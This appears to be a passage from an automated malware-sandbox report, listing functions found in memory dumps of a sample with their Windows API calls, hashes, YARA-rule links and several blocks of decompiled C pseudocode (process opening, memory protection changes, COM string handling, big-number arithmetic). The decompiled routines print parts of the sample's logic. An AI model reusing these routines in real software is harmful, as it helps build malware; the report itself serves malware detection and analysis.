                                                            • Instruction ID: b16c6c070d0ee944ec908c6daedeb5ee0a153e482ce05a3865461e1c99920910
                                                            • Opcode Fuzzy Hash: 16603e6e055a22aa737e01afa54eaed9d7eaa3418e101dc9e64edd953dcccbd7
                                                            • Instruction Fuzzy Hash: F2014C76100218EFD712AB99EC84F9E77ACFB49314F115029F505AB251CF78AD08AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04576A77, Relevance: 7.5, APIs: 5, Instructions: 45libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32 ref: 04576A97
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AA5
                                                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 04576AB2
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AC9
                                                            • GetModuleHandleA.KERNEL32 ref: 04576AD5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HandleModule$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1178273743-0
                                                            • Opcode ID: c64cd9319ce71d66bcbdda9e6c43ddbde464b518ffad0c258b5fd9730e558178
                                                            • Instruction ID: d83dea132e489cf9b4aada4d7cbdf3c0f02dc16752a947b0f4792feb5a087496
                                                            • Opcode Fuzzy Hash: c64cd9319ce71d66bcbdda9e6c43ddbde464b518ffad0c258b5fd9730e558178
                                                            • Instruction Fuzzy Hash: 9101623160031ADF9B019F6AFC419667B99FB042B0704403AFA15D6260DFA5EC35BB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456CD5E, Relevance: 7.5, APIs: 5, Instructions: 42memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CD69
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456CD7A
                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000000C,?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000), ref: 0456CD91
                                                            • VirtualProtect.KERNEL32(?,00000004,0000000C,0000000C,?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000), ref: 0456CDAB
                                                            • GetLastError.KERNEL32(?,?,045802E6,0458B7A0,-0000000C,00000000,0457C508,0000000C,00000000,?,0000000C,00000000,?), ref: 0456CDB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                                                            • String ID:
                                                            • API String ID: 653387826-0
                                                            • Opcode ID: 868a8b48383da8927699c7dcd3aaa5bbde2fe40bf26c32ca1cd01d7e1aae3319
                                                            • Instruction ID: 29a61471680d3720c2073a87a26f653634793904a4373ae198d6fd554686e6ed
                                                            • Opcode Fuzzy Hash: 868a8b48383da8927699c7dcd3aaa5bbde2fe40bf26c32ca1cd01d7e1aae3319
                                                            • Instruction Fuzzy Hash: 76014FB6200604EFD7219F15DC04E6AB7B9FF84621B10451DEA56A3250DB71FD05AB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456389A, Relevance: 7.5, APIs: 5, Instructions: 35synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 045638A7
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040), ref: 045638B7
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000040), ref: 045638C0
                                                            • VirtualFree.KERNEL32(000003E8,00000000,00008000,?,00000000,045767F1,?,?,00000040), ref: 045638DE
                                                            • VirtualFree.KERNEL32(00002710,00000000,00008000,?,00000000,045767F1,?,?,00000040), ref: 045638EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 3667519916-0
                                                            • Opcode ID: e21bd8bb68763bfe18cd1ec34a24bec96d3ba489a8baaf7fb75148b0f1eb0ff9
                                                            • Instruction ID: d462473a4022515af200e5cdc5da226772093606590e3b7eaaff6fd4a2f6f2d0
                                                            • Opcode Fuzzy Hash: e21bd8bb68763bfe18cd1ec34a24bec96d3ba489a8baaf7fb75148b0f1eb0ff9
                                                            • Instruction Fuzzy Hash: 55F05E70200700AFEB206B35EC48F57B2A9FF84715F104628F946A2590CF28FC49EA24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04562730, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0456136B,?), ref: 04562738
                                                            • GetVersion.KERNEL32 ref: 04562747
                                                            • GetCurrentProcessId.KERNEL32 ref: 04562756
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04562773
                                                            • GetLastError.KERNEL32 ref: 04562792
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: 9db34ec00910a686ade6f01689c8040cbc1d13bc2b18bb60098eec5cf3de0cd4
                                                            • Instruction ID: df2ded1324feaac54ca1e34ad58427a5e97044fdc7cfa6521423b6c5847c6205
                                                            • Opcode Fuzzy Hash: 9db34ec00910a686ade6f01689c8040cbc1d13bc2b18bb60098eec5cf3de0cd4
                                                            • Instruction Fuzzy Hash: 94F0BD74A80341DEE7619F24A889B153BA4F704B81F10651DF657E66C0DF78A844FB29
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD6707, Relevance: 7.5, APIs: 5, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD6707(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xdda2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xdda2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xdda2b0 = _t6;
				 *0xdda2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xdda2ac = _t7;
				if(_t7 == 0) {
					 *0xdda2ac =  *0xdda2ac | 0xffffffff;
				}
				return 0;
			}








                                                            0x00dd670f
                                                            0x00dd6717
                                                            0x00dd671c
                                                            0x00000000
                                                            0x00dd6769
                                                            0x00dd671e
                                                            0x00dd6726
                                                            0x00dd6766
                                                            0x00000000
                                                            0x00dd6766
                                                            0x00dd6728
                                                            0x00dd672d
                                                            0x00dd673f
                                                            0x00dd6744
                                                            0x00dd674a
                                                            0x00dd6752
                                                            0x00dd6757
                                                            0x00dd6759
                                                            0x00dd6759
                                                            0x00000000

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DD6671,?,?,00000001), ref: 00DD670F
                                                            • GetVersion.KERNEL32(?,00000001), ref: 00DD671E
                                                            • GetCurrentProcessId.KERNEL32(?,00000001), ref: 00DD672D
                                                            • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DD674A
                                                            • GetLastError.KERNEL32(?,00000001), ref: 00DD6769
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                            • String ID:
                                                            • API String ID: 2270775618-0
                                                            • Opcode ID: a016eb702d8d111a301918918d7957239d6499bbdb9813ca932d97494ea46695
                                                            • Instruction ID: 3d07e4600f3e40b074ab7fb6b55f44bffe131711fe2b505d8444d75ed8214897
                                                            • Opcode Fuzzy Hash: a016eb702d8d111a301918918d7957239d6499bbdb9813ca932d97494ea46695
                                                            • Instruction Fuzzy Hash: B5F01770A46305AFD7A09FAAAE19B257FA5A704B44F14841BE646C63E4D7729400CF3A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457B2D1, Relevance: 6.3, APIs: 5, Instructions: 92memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B35B
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B36C
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B384
                                                            • CloseHandle.KERNEL32(?), ref: 0457B39E
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457B3B3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FreeHeap$CloseHandle
                                                            • String ID:
                                                            • API String ID: 1910495013-0
                                                            • Opcode ID: 4277f68b474f2cfa718528a58c77ce48a302b58529645685e8f60b64c600cab6
                                                            • Instruction ID: fdbaa165aa6b35d3f03b8c4a5bc3d14779a5a0b2d3cdc09874b64a2ef30b995f
                                                            • Opcode Fuzzy Hash: 4277f68b474f2cfa718528a58c77ce48a302b58529645685e8f60b64c600cab6
                                                            • Instruction Fuzzy Hash: C0312670201522EFC721AF65E988C2EFBAAFF44B183544524F404E7651CB36FCA1EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457F43C, Relevance: 6.3, APIs: 5, Instructions: 78memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0457F460
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • wsprintfA.USER32 ref: 0457F491
                                                              • Part of subcall function 0456C12C: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0456C142
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C16A
                                                              • Part of subcall function 0456C12C: lstrlen.KERNEL32(00000008), ref: 0456C179
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C1B9
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C1EE
                                                              • Part of subcall function 0456C12C: memcpy.NTDLL(00000000,?,?), ref: 0456C1FB
                                                              • Part of subcall function 0456C12C: memcpy.NTDLL(00000008,045863D8,00000002,00000000,?,?), ref: 0456C210
                                                              • Part of subcall function 0456C12C: wsprintfA.USER32 ref: 0456C233
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0457F506
                                                              • Part of subcall function 04583EDA: RtlEnterCriticalSection.NTDLL(049BB148), ref: 04583EF0
                                                              • Part of subcall function 04583EDA: RtlLeaveCriticalSection.NTDLL(049BB148), ref: 04583F0B
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000), ref: 0457F4F0
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0457F4FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                                                            • String ID:
                                                            • API String ID: 3553201432-0
                                                            • Opcode ID: 4221d428089ff6ab8cee2e86281dabef0290071b7a1d658c65385647c95882ed
                                                            • Instruction ID: 716f0713ebd1dd2160b963c7592b0105754c554f5796c36a53421ca0ee4e3653
                                                            • Opcode Fuzzy Hash: 4221d428089ff6ab8cee2e86281dabef0290071b7a1d658c65385647c95882ed
                                                            • Instruction Fuzzy Hash: 4921F97290014AFBCF11DFA5ED84C9F7BB9FB48304B00442AF915A6211DB75EA64EF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04563CC3, Relevance: 6.2, APIs: 4, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 045691D3: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 045691EE
                                                              • Part of subcall function 045691D3: LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0456923C
                                                              • Part of subcall function 045691D3: GetProcAddress.KERNEL32(00000000,?), ref: 04569255
                                                              • Part of subcall function 045691D3: RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 045692A6
                                                            • GetLastError.KERNEL32(?,?,?), ref: 04563E51
                                                            • FreeLibrary.KERNEL32(?,?,?), ref: 04563EB9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                                                            • String ID:
                                                            • API String ID: 1730969706-0
                                                            • Opcode ID: deccdaf21810619296c04c9f5cc081b583cb375d26444ac7d7c53620d492ddd0
                                                            • Instruction ID: 8169a70b36b3d15e54833255055e03432881217acd64c59926485b32716bed4d
                                                            • Opcode Fuzzy Hash: deccdaf21810619296c04c9f5cc081b583cb375d26444ac7d7c53620d492ddd0
                                                            • Instruction Fuzzy Hash: 0C71F6B5E0020AEFCF10DFE5D9849AEBBB9FF48314B108469E916AB250D731AD45DF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457E73D, Relevance: 6.2, APIs: 4, Instructions: 156threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0457BAE4: lstrlen.KERNEL32(?,7656D3B0,00000000,00000000,04574A41,00000000,00000001,00000000,73B74D40,?,?,04575ADA,00000000,00000000), ref: 0457BAED
                                                              • Part of subcall function 0457BAE4: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,04575ADA,00000000,00000000,?,?,00000000,045681F3), ref: 0457BB10
                                                              • Part of subcall function 0457BAE4: memset.NTDLL ref: 0457BB1F
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,7656D3B0,049BB17C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B5D
                                                              • Part of subcall function 04580B38: StrTrimA.SHLWAPI(00000000,0458847C,00000000,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B7C
                                                              • Part of subcall function 04580B38: StrChrA.SHLWAPI(00000000,04575ADA,?,04563CAE,04575ADA,00000020,049BB17C,?,?,04575ADA), ref: 04580B88
                                                            • GetCurrentThreadId.KERNEL32 ref: 0457E7D5
                                                            • GetCurrentThread.KERNEL32 ref: 0457E7E8
                                                            • GetModuleHandleA.KERNEL32(00000000,045863D4,00000000,00000000,?,00000000,?,00000000,00000000,?), ref: 0457E86F
                                                            • GetShellWindow.USER32 ref: 0457E876
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1517849391-0
                                                            • Opcode ID: bdecd850fdcbf96ec65e6e0433f1229daae49fc4883a0d98393f849e8763f47c
                                                            • Instruction ID: e091f04f9104f739df700a1ccdaa7171ad40c06868f917f7811a266fb3866d7f
                                                            • Opcode Fuzzy Hash: bdecd850fdcbf96ec65e6e0433f1229daae49fc4883a0d98393f849e8763f47c
                                                            • Instruction Fuzzy Hash: BF518F72604301EFE710EF64E886A5AB7E8FF88714F00497DF545AB250DA74F948EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD2CA0, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 46%
                                                            			E00DD2CA0(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xdda2d4; // 0x2bed5a8
					_t5 = _t102 + 0xddb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xdd92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xdda2d4; // 0x2bed5a8
												_t28 = _t108 + 0xddb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xdda2d4; // 0x2bed5a8
														_t33 = _t78 + 0xddb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                            0x00dd2ca5
                                                            0x00dd2cae
                                                            0x00dd2caf
                                                            0x00dd2cb3
                                                            0x00dd2cb9
                                                            0x00dd2cbf
                                                            0x00dd2cc8
                                                            0x00dd2cce
                                                            0x00dd2cd8
                                                            0x00dd2cda
                                                            0x00dd2ce0
                                                            0x00dd2ce5
                                                            0x00dd2cf0
                                                            0x00dd2cf8
                                                            0x00dd2cfb
                                                            0x00dd2e1e
                                                            0x00dd2d01
                                                            0x00dd2d01
                                                            0x00dd2d0e
                                                            0x00dd2d14
                                                            0x00dd2d1a
                                                            0x00dd2d1e
                                                            0x00dd2d24
                                                            0x00dd2d31
                                                            0x00dd2d35
                                                            0x00dd2d3b
                                                            0x00dd2d3e
                                                            0x00dd2d44
                                                            0x00dd2d4a
                                                            0x00dd2d50
                                                            0x00dd2d53
                                                            0x00dd2d56
                                                            0x00dd2d5c
                                                            0x00dd2d65
                                                            0x00dd2d6b
                                                            0x00dd2d6c
                                                            0x00dd2d6f
                                                            0x00dd2d70
                                                            0x00dd2d71
                                                            0x00dd2d79
                                                            0x00dd2d7a
                                                            0x00dd2d7b
                                                            0x00dd2d7d
                                                            0x00dd2d81
                                                            0x00dd2d85
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2d8b
                                                            0x00dd2d94
                                                            0x00dd2d9a
                                                            0x00dd2da4
                                                            0x00dd2da8
                                                            0x00dd2daa
                                                            0x00dd2db7
                                                            0x00dd2dbb
                                                            0x00dd2dc3
                                                            0x00dd2dc8
                                                            0x00dd2dda
                                                            0x00dd2ddc
                                                            0x00dd2de2
                                                            0x00dd2de2
                                                            0x00dd2deb
                                                            0x00dd2deb
                                                            0x00dd2ded
                                                            0x00dd2df3
                                                            0x00dd2df3
                                                            0x00dd2df6
                                                            0x00dd2dfc
                                                            0x00dd2dff
                                                            0x00dd2e08
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd2e08
                                                            0x00dd2d5c
                                                            0x00dd2d56
                                                            0x00dd2d3e
                                                            0x00dd2e0e
                                                            0x00dd2e0e
                                                            0x00dd2e14
                                                            0x00dd2e14
                                                            0x00dd2e1a
                                                            0x00dd2e1a
                                                            0x00dd2e23
                                                            0x00dd2e29
                                                            0x00dd2e29
                                                            0x00dd2ce5
                                                            0x00dd2e32

                                                            APIs
                                                            • SysAllocString.OLEAUT32(00DD92B0), ref: 00DD2CF0
                                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DD2DD2
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD2DEB
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD2E1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$Free$Alloclstrcmp
                                                            • String ID:
                                                            • API String ID: 1885612795-0
                                                            • Opcode ID: fb6be0a07e70bd6b00c2dca8f70e8fa830cc04d61a6b1267123ab07c58596398
                                                            • Instruction ID: 9461886dd8d0591167d830d48ef5de92d36f472e7dfd294aee6cb61cd1074462
                                                            • Opcode Fuzzy Hash: fb6be0a07e70bd6b00c2dca8f70e8fa830cc04d61a6b1267123ab07c58596398
                                                            • Instruction Fuzzy Hash: AB511D75D00619EFCB01DFA8C9888AEF7BAEF89704B148596E915EB314D7729D01CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD211F, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00DD2160
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD2243
                                                              • Part of subcall function 00DD2CA0: SysAllocString.OLEAUT32(00DD92B0), ref: 00DD2CF0
                                                            • SafeArrayDestroy.OLEAUT32(?), ref: 00DD2297
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD22A5
                                                              • Part of subcall function 00DD2B38: Sleep.KERNEL32(000001F4), ref: 00DD2B80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                            • String ID:
                                                            • API String ID: 3193056040-0
                                                            • Opcode ID: d06b5a955d03801c4c09bfcbe86947a9c05061c0f0465b54a8238592b7085d0f
                                                            • Instruction ID: 758e4615662233556163d086132d596488f7fbcc6be3527507488c7af2ee724f
                                                            • Opcode Fuzzy Hash: d06b5a955d03801c4c09bfcbe86947a9c05061c0f0465b54a8238592b7085d0f
                                                            • Instruction Fuzzy Hash: 8C51027590020AEFCB00DFE8C8848AEBBB6FF98340B15886AF555EB320D7719D45CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04574CF5, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04574DA8
                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04574DBE
                                                            • memset.NTDLL ref: 04574E67
                                                            • memset.NTDLL ref: 04574E7D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset$_allmul_aulldiv
                                                            • String ID:
                                                            • API String ID: 3041852380-0
                                                            • Opcode ID: 49fb98586aa0344c97cbc06a79abe09e5f593a607d3f5c6e34c564a090dc6c51
                                                            • Instruction ID: 2ad4a0588bc0b671d537d972ecffa40bcf77032a79ece3f95922af3cdad0b858
                                                            • Opcode Fuzzy Hash: 49fb98586aa0344c97cbc06a79abe09e5f593a607d3f5c6e34c564a090dc6c51
                                                            • Instruction Fuzzy Hash: 3A41A57160021ABFEB109E68EC44BEE7775FF86324F004579F955A7180EB70BE449B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD67C4, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 85%
                                                            			E00DD67C4(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00DD4E19(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00DD430F(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00DD6C82(_t101,  &_v428, _a8, _t96 - _t81);
					E00DD6C82(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00DD430F(_t101, 0xdda188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00DD430F(_a16, _a4);
						E00DD24AE(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00DD7DDC();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00DD7DD6();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00DD3BCC(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00DD4858(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00DD319B(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xdda188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
